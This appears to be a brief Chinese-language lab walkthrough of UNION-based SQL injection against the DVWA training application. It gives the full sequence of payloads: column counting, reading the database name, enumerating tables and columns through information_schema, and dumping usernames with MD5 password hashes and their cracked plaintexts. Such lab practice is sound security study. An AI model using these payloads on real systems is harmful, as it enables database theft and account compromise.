' or 1=1 order by 3 #
查询的时候,数据库返回的查询结果只有两列
这张表使用的数据库是什么?
' union select 1,database() #
分析结果:dvwa
使用的‘dvwa’数据库它有多少张表,表明分别叫什么?
' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'dvwa' #
分析结果:guestbook,users
已经知道了users表中有我们需要的信息,需要知道users表里面的字段?
' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' #
分析结果:user_id,first_name,last_name,user,password,avatar,last_login,failed_login
我们需要的是user,password字段的查询结果
' union select user,password from users #
分析结果:
admin
5f4dcc3b5aa765d61d8327deb882cf99(password)
gordonb
e99a18c428cb38d5f260853678922e03(abc123)
1337
8d3533d75ae2c3966d7e0d4fcc69216b(charley)
yyc
111111111